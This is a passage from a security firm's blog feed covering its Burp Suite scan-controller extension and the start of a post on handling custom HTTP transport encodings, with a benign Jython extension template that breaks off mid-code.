&lt;li&gt;&lt;p&gt;Delays before repeatability checks or scans, which allows you to browse the website for a while without being disturbed. Additionally, if a request turns non-repatable after 10 seconds it's better not to scan it at all and let you know.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Scanning requests that are not repeatable (not recommended)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Building your own "interesting score" by URL file extension, HTTP status code, HTTP method and number of parameters. Define the score values.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Changing the heuristic keywords to figure out if a request is repeatable or not&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Reimplemented JSON, XML and multipart injection. This was necessary, because extensions in Burp can currently not set a parameter value of JSON bodies through the official Burp API.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Added Non-Standard-HTTP header and URL path injection&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Thread pooling to make sure Burp Proxy is never waiting for the extension (performance)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Make requests repeatable by using Hackvertor tags and show it in the UI. This means you can reuse the repeatable request in other tools such as the Burp Repeater.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The usual Burp extender API workarounds such as project-level storage.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Hiding items in the table&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We're currently working on a new version of the extension where the following things will change:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;New feature: Ignoring requests if the response matches a certain regex&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: Influence "interesting score" by response content-type (disabled by default as URL file extensions are usually sufficient)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: To declutter the UI, most options will be hidden by default and there is a button to toggle advanced options.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: The extension UI is divided into more tabs which group options together.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: Divide repeatability reasoning and scan reasoning in the UI&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We are also going to add additional scan capabilities (like ActiveScan++), for example:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Add non-standard HTTP headers as insertion points&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add URL paths as insertion points (often used as parameters in REST APIs)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add Bearer Authorization HTTP header as an insertion point, this is important because Burp's new scanner checks for JSON Web Tokens (JWT) and is not yet checking the default "Authorization: Bearer ey[...]" location.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add Basic Authorization HTTP header as an insertion point (username:password in base64)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Automated Smart Content Discovery as part of scanning, meaning automated &lt;a class="reference external" href="https://github.com/hannob/snallygaster"&gt;Snallygaster&lt;/a&gt; checks are performed per directory.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202208_pentagrid_Scan_controller_snallygaster.png"&gt;
&lt;img alt="Scanner options showing advanced smart content discovery options." class="align-center" src="https://www.pentagrid.ch/images/202208_pentagrid_Scan_controller_snallygaster.thumbnail.png"&gt;
&lt;/a&gt;
&lt;p&gt;So stay tuned for the next release.&lt;/p&gt;
&lt;!-- We are hiring! Pentagrid is looking for `Junior and Senior IT Security Analysts in Berlin and Buchs, St. Gallen &lt;link://slug/career&gt;`_. --&gt;</description><category>Burp</category><category>Conference</category><category>Extension</category><category>OWASP</category><category>Pentesting</category><category>Scanning</category><category>Web</category><guid>https://www.pentagrid.ch/en/blog/improving-web-application-security-testing-with-pentagrid-scan-controller/</guid><pubDate>Tue, 23 Aug 2022 12:42:00 GMT</pubDate></item><item><title>Teaching Burp a new HTTP Transport Encoding</title><link>https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;Today we would like to talk about Burp Suite Professional and extensions again. In this blog post we explain how we can teach Burp Suite to handle a custom Transport Encoding that is spoken between an HTTP client and a server by using Burp extensions.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Burp has many nice features, but sometimes it lacks a feature we would like to have or our target application is customized so that it is necessary to teach Burp new things. More specifically:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Burp has &lt;a class="reference external" href="https://forum.portswigger.net/thread/brotli-compression-is-not-supported-988bf33f"&gt;no support for the standard HTTP brotli Transport-Encoding&lt;/a&gt;, but all modern browsers do. This problem is handled by Burp by removing brotli from the Accept-Encoding request header (see Proxy - Options - Miscellaneous - Remove unsupported encodings from Accept-Encoding headers in incoming requests), which works for modern browsers. However, we encountered situations during tests where a non-browser HTTP client software required brotli and refused to talk to the server when brotli encoding is missing.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Java fat clients sometimes zlib-encode the entire HTTP body when talking to a server and vice-versa. They also often refuse to speak non-zlib and do not signal it at all in an HTTP header, therefore it is necessary to implement zlib-decoding and encoding to be able to use Burp properly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If a website uses JavaScript to encrypt all HTTP bodies when talking to a server and vice-versa, we also would like to implement a decryption and encryption routing to use the Burp tools. We also encountered the same situation with other HTTP clients that used additional transport encryption, such as mobile banking apps.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The biggest issue for us was to figure out how we approach these situations consistently and we show our approach in this blog post.&lt;/p&gt;
&lt;p&gt;In this blog post we often refer to "encoding" or "encrypting", which obviously is not the same, but both operations have to be done at the same place inside Burp. Encryption or encoding is merely an implementation detail in this blog post. Also "cleartext" is used to indicate decoded or decrypted content.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="why-are-you-doing-all-of-this"&gt;
&lt;h2&gt;Why are you doing all of this?&lt;/h2&gt;
&lt;p&gt;If Burp is not seeing decoded messages for one of the reasons above, it won't work properly. Tools such as Burp Scanner, Repeater, Intruder and other extensions will often fail to interpret the encoded HTTP content and will for sure fail with encrypted content. It won't matter if you use the scanner or not, in many cases it won't do anything useful if you don't implement this custom decoder/encoder. On the contrary, very often a tester's task is to make their tools work. This might be rewarded in the end by simply pressing the active scan button in Burp and then finding security issues. To us, this is a huge difference between a good and a bad security analysis.&lt;/p&gt;
&lt;p&gt;Usually we would suggest to solve this problem with features or extensions that are already present, for example the Hackvertor extension would be a good candidate. However, Hackvertor won't modify responses, so this isn't an option here.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="burp-s-api-for-extensions"&gt;
&lt;h2&gt;Burp's API for extensions&lt;/h2&gt;
&lt;p&gt;Burp provides several &lt;a class="reference external" href="https://portswigger.net/burp/extender/api/"&gt;APIs an extension can use&lt;/a&gt;. The API code didn't get much love in the last few years, but this is hopefully changing when Burp releases the &lt;a class="reference external" href="https://portswigger.net/blog/burp-suite-roadmap-for-2022"&gt;New API and multi-language extensibility&lt;/a&gt;. Let's hope for the best, but for now we're stuck with the API we have. There are two main API hooks that matter in the situation of a missing Transport Encoding. We'll use the name of the function name in the rest of this blog post, but the interfaces that provide the functionality are called:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://portswigger.net/burp/extender/api/burp/IProxyListener.html"&gt;IProxyListener&lt;/a&gt;, which means you have to implement the function &lt;code class="docutils literal"&gt;processProxyMessage&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://portswigger.net/burp/extender/api/burp/IHttpListener.html"&gt;IHttpListener&lt;/a&gt;, which means you have to implement the function &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While both interfaces sound similar, the proxy listener will only see requests and responses going through the proxy (e.g. from the browser), whereas the HTTP listener will see the requests and responses of all tools (Proxy, Crawler, Scanner, Repeater, Intruder, other extensions, etc.). However, there's one little detail that is important to mention: If you want to change messages going throught the proxy, you have to do that in the &lt;code class="docutils literal"&gt;processProxyMessage&lt;/code&gt; function and you can't do that in the &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt;. It's just a Burp API limitation that you can't modify messages from TOOL_PROXY in the &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt;. That means we have to get around this limitation by choosing the correct API.&lt;/p&gt;
&lt;p&gt;While we think it is better to use Kotlin to write large Burp extensions nowadays, rapid prototyping is still quicker with Python. Therefore we use Python (or rather, Jython 2.7 in Burp) in this blog post.&lt;/p&gt;
&lt;p&gt;Here's a little Python sample extension that handles the API confusion of &lt;code class="docutils literal"&gt;processProxyMessage&lt;/code&gt; and &lt;code class="docutils literal"&gt;processHttpMessage&lt;/code&gt;, so we don't need to care about it anymore and can just modify messages in the newly created &lt;code class="docutils literal"&gt;processMessage&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code python"&gt;&lt;a id="rest_code_773268b73f2b497380611e55069e938d-1" name="rest_code_773268b73f2b497380611e55069e938d-1" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-1"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IBurpExtender&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-2" name="rest_code_773268b73f2b497380611e55069e938d-2" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-2"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IHttpListener&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-3" name="rest_code_773268b73f2b497380611e55069e938d-3" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-3"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IProxyListener&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-4" name="rest_code_773268b73f2b497380611e55069e938d-4" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-4"&gt;&lt;/a&gt;&lt;span class="kn"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;burp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-5" name="rest_code_773268b73f2b497380611e55069e938d-5" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-5"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-6" name="rest_code_773268b73f2b497380611e55069e938d-6" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-6"&gt;&lt;/a&gt;&lt;span class="n"&gt;NAME&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Pentagrid Extension Template"&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-7" name="rest_code_773268b73f2b497380611e55069e938d-7" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-7"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-8" name="rest_code_773268b73f2b497380611e55069e938d-8" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-8"&gt;&lt;/a&gt;&lt;span class="k"&gt;class&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nc"&gt;BurpExtender&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IBurpExtender&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IProxyListener&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;IHttpListener&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-9" name="rest_code_773268b73f2b497380611e55069e938d-9" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-9"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-10" name="rest_code_773268b73f2b497380611e55069e938d-10" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-10"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;registerExtenderCallbacks&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-11" name="rest_code_773268b73f2b497380611e55069e938d-11" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-11"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# keep a reference to our callbacks object&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-12" name="rest_code_773268b73f2b497380611e55069e938d-12" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-12"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_callbacks&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;callbacks&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-13" name="rest_code_773268b73f2b497380611e55069e938d-13" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-13"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-14" name="rest_code_773268b73f2b497380611e55069e938d-14" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-14"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# set our extension name&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-15" name="rest_code_773268b73f2b497380611e55069e938d-15" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-15"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setExtensionName&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-16" name="rest_code_773268b73f2b497380611e55069e938d-16" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-16"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-17" name="rest_code_773268b73f2b497380611e55069e938d-17" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-17"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# register ourselves as an Proxy listener&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-18" name="rest_code_773268b73f2b497380611e55069e938d-18" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-18"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;registerProxyListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-19" name="rest_code_773268b73f2b497380611e55069e938d-19" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-19"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-20" name="rest_code_773268b73f2b497380611e55069e938d-20" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-20"&gt;&lt;/a&gt;        &lt;span class="c1"&gt;# register ourselves as an HTTP listener&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-21" name="rest_code_773268b73f2b497380611e55069e938d-21" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-21"&gt;&lt;/a&gt;        &lt;span class="n"&gt;callbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;registerHttpListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-22" name="rest_code_773268b73f2b497380611e55069e938d-22" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-22"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-23" name="rest_code_773268b73f2b497380611e55069e938d-23" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-23"&gt;&lt;/a&gt;        &lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"Loaded "&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s2"&gt;" successfully!"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-24" name="rest_code_773268b73f2b497380611e55069e938d-24" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-24"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-25" name="rest_code_773268b73f2b497380611e55069e938d-25" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-25"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-26" name="rest_code_773268b73f2b497380611e55069e938d-26" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-26"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;# implement IHttpListener&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-27" name="rest_code_773268b73f2b497380611e55069e938d-27" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-27"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-28" name="rest_code_773268b73f2b497380611e55069e938d-28" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-28"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-29" name="rest_code_773268b73f2b497380611e55069e938d-29" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-29"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processHttpMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-30" name="rest_code_773268b73f2b497380611e55069e938d-30" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-30"&gt;&lt;/a&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TOOL_PROXY&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-31" name="rest_code_773268b73f2b497380611e55069e938d-31" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-31"&gt;&lt;/a&gt;            &lt;span class="c1"&gt;# DONT'T DO ANYTHING HERE&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-32" name="rest_code_773268b73f2b497380611e55069e938d-32" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-32"&gt;&lt;/a&gt;            &lt;span class="c1"&gt;# Instead, use processProxyMessage below&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-33" name="rest_code_773268b73f2b497380611e55069e938d-33" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-33"&gt;&lt;/a&gt;            &lt;span class="c1"&gt;# https://github.com/nccgroup/BurpSuiteLoggerPlusPlus/issues/42&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-34" name="rest_code_773268b73f2b497380611e55069e938d-34" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-34"&gt;&lt;/a&gt;            &lt;span class="k"&gt;return&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-35" name="rest_code_773268b73f2b497380611e55069e938d-35" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-35"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;processMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-36" name="rest_code_773268b73f2b497380611e55069e938d-36" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-36"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-37" name="rest_code_773268b73f2b497380611e55069e938d-37" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-37"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-38" name="rest_code_773268b73f2b497380611e55069e938d-38" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-38"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;# implement IProxyListener&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-39" name="rest_code_773268b73f2b497380611e55069e938d-39" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-39"&gt;&lt;/a&gt;    &lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-40" name="rest_code_773268b73f2b497380611e55069e938d-40" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-40"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processProxyMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-41" name="rest_code_773268b73f2b497380611e55069e938d-41" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-41"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;processMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IBurpExtenderCallbacks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TOOL_PROXY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getMessageInfo&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-42" name="rest_code_773268b73f2b497380611e55069e938d-42" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-42"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-43" name="rest_code_773268b73f2b497380611e55069e938d-43" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-43"&gt;&lt;/a&gt;
&lt;a id="rest_code_773268b73f2b497380611e55069e938d-44" name="rest_code_773268b73f2b497380611e55069e938d-44" href="https://www.pentagrid.ch/en/blog/teaching_burp_a_new_http_transport_encoding/#rest_code_773268b73f2b497380611e55069e938d-44"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;processMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;toolFlag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageIsRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messageInfo&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
